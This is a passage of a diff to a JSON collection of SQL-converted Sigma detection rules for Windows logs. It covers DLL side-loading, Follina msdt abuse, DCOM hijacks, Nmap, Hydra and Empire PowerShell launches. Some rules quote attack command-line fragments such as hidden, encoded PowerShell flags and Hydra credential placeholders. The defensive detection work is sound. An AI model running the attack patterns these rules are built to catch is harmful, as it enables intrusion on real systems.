'%\\\\licensingdiagspp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\linkinfo.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\loadperf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncontroller.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lpksetupproxyserv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\magnification.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mapistub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfplat.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\midimap.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\miutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mlang.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mmdevapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mobilenetworking.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mpr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mprapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mrmcorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msacm32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscms.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctfmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msftedit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msutb.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswb7.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswsock.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msxml3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mtxclu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\napinsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ncrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ndfapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netiohlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netplwiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprofm.dll' ESCAPE '\\' OR 
ImageLoaded LIKE '%\\\\netsetupapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netshell.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\networkexplorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\newdev.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ninput.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlaapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlansp\\_c.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\npmproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshwfp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntdsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlanman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlmshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntmarta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntshrui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\oleacc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\omadmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\onex.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osbaseln.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osuninst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2p.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2pnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p9np.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pcaui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\peerdistsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pla.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pnrpnsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\policymanager.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\polstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\printui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\propsys.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prvdmofcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\puiapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\radcui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasgcw.dll' ESCAPE '\\' 
OR ImageLoaded LIKE '%\\\\rasman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasmontr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reagent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\regapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rmclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpcnsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtworkq.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sapi\\_onecore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sas.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scansetting.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scecli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\schedcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\secur32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\shell32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\slc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\snmpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srvcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp\\_isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\staterepository.core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\structuredquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sxshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tbs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsworkspace.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinui.appcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uianimation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiautomationcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uireng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiribbon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\updatepolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\userenv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utildll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxinit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxtheme.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vaultcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\virtdisk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcnnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdscore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\webservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wecapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wevtapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\whhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wimgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbrand.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.search.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecsext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowsudk.shellcommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winipsec.dll' ESCAPE '\\' OR 
ImageLoaded LIKE '%\\\\winmde.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winnsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winrnr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsqlite3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wkscli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlanapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlidprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmidcom.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmsgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wofutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wpdshext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshbth.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xmllite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xolehlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwizards.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwtpw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aclui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bderepair.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootmenuux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcntel.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dynamoapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhsvcctl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\inproclogger.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kdstub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\maintenanceui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mdmdiagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mintdh.dll' ESCAPE 
'\\' OR ImageLoaded LIKE '%\\\\msdtctm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nettrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osksupport.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reseteng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resetengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spectrumsyncclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\systemsettingsthresholdadminflowui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\timesync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\upshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmpdui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpx.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxstiff.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xpsservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appvpolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\batmeter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\configmanager2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coredplus.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coreuicomponents.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcommandlineutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drvstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsprop.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edgeiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\framedynos.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveskybackup.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fvewiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\icmp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumsdk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lockhostingframework.dll' ESCAPE '\\' OR ImageLoaded 
LIKE '%\\\\lrwizdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mbaexmlparser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfc42u.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp110\\_win.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netjoin.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprovfw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\opcservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pkeyhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\playsndsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\powrprof.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prntvpt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximitycommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximityservicepal.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasdlg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\security.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppcext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srmtrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tpmcoreprovisioning.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\umpdc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\unattend.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\urlmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vdsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbio.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.ui.immersive.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winscard.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wsmsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FxsCompose.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WfsR.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpchttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\storageusage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\PrintIsolationProxy.dll' ESCAPE 
'\\' OR ImageLoaded LIKE '%\\\\msdtcVSp1res.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rdpendp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxilconv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utcutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appraiser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsound.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DispBroker.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FXSRESM.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptnet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\COMRES.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdumdim64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd12umd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdusc64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\')) OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\AppVPolicy.dll' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (ImageLoaded LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe%' ESCAPE '\\') AND 
ImageLoaded LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wldp.dll' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_var.yml" + "filename": "image_load_side_load_from_non_system_location.yml" }, { - "title": "PUA - Nmap/Zenmap Execution", - "id": "f6ecd1cf-19b8-4488-97f6-00f0924991a3", + "title": "Potential DCOM InternetExplorer.Application DLL Hijack - Image Load", + "id": "f354eba5-623b-450f-b073-0b5b2773b6aa", "status": "test", - "description": "Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", - "author": "frack113", + "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", "tags": [ - "attack.discovery", - "attack.t1046" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" ], "falsepositives": [ - "Network administrator computer" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\nmap.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\zennmap.exe' ESCAPE '\\') OR OriginalFileName IN ('nmap.exe', 'zennmap.exe')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_nmap_zenmap.yml" + 
"filename": "image_load_dcom_iertutil_dll_hijack.yml" }, { - "title": "Blue Mockingbird", - "id": "c3198a27-23a0-4c2c-af19-e5328d49680e", + "title": "Microsoft VBA For Outlook Addin Loaded Via Outlook", + "id": "9a0b8719-cd3c-4f0a-90de-765a4cb3f5ed", "status": "test", - "description": "Attempts to detect system changes made by Blue Mockingbird", - "author": "Trent Liffick (@tliffick)", + "description": "Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1112", - "attack.t1047" + "attack.t1204.002" ], "falsepositives": [ - "Unknown" + "Legitimate macro usage. Add the appropriate filter according to your environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%sc config%' ESCAPE '\\' AND CommandLine LIKE '%wercplsupporte.dll%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '%COR\\_PROFILER' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND ImageLoaded LIKE '\\\\outlvba.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_blue_mockingbird.yml" + "filename": "image_load_office_outlook_outlvba_load.yml" }, { - "title": "HackTool - Empire PowerShell Launch Parameters", - "id": "79f4ede3-402e-41c8-bc3e-ebbf5f162581", - "status": "test", - "description": "Detects suspicious powershell command line parameters used in Empire", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential DLL Sideloading Via VMware Xfer", + "id": "9313dc13-d04c-46d8-af4a-a930cc55d93b", + "status": "experimental", + "description": "Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL", + "author": "Nasreddine Bencherchali (Nextron Systems)", 
"tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Other tools that incidentally use the same command line parameters" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -NoP -sta -NonI -W Hidden -Enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc %' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -W Hidden -enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc%' ESCAPE '\\' OR CommandLine LIKE '% -enc SQB%' ESCAPE '\\' OR CommandLine LIKE '% -nop -exec bypass -EncodedCommand %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\glib-2.0.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_empire_powershell_launch.yml" + "filename": "image_load_side_load_vmware_xfer.yml" }, { - "title": "HackTool - Hydra Password Bruteforce Execution", - "id": "aaafa146-074c-11eb-adc1-0242ac120002", - "status": "test", - "description": "Detects command line parameters used by Hydra password guessing hack tool", - "author": "Vasiliy Burov", + "title": "Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE", + "id": "ec8c4047-fad9-416a-8c81-0f479353d7f6", + "status": "experimental", + "description": "Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the \"sdiageng.dll\" library", + "author": "Greg (rule)", "tags": [ - "attack.credential_access", - "attack.t1110", - "attack.t1110.001" + "attack.defense_evasion", + "attack.t1202", + "cve.2022.30190" ], "falsepositives": [ - "Software that uses the caret encased keywords PASS and USER in its command line" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-u %' 
ESCAPE '\\' AND CommandLine LIKE '%-p %' ESCAPE '\\' AND (CommandLine LIKE '%^USER^%' ESCAPE '\\' OR CommandLine LIKE '%^PASS^%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\sdiageng.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_hydra.yml" + "filename": "image_load_dll_sdiageng_load_by_msdt.yml" }, { - "title": "Suspicious Download from Office Domain", - "id": "00d49ed5-4491-4271-a8db-650a4ef6f8c1", - "status": "experimental", - "description": "Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", - "falsepositives": [ - "Scripts or tools 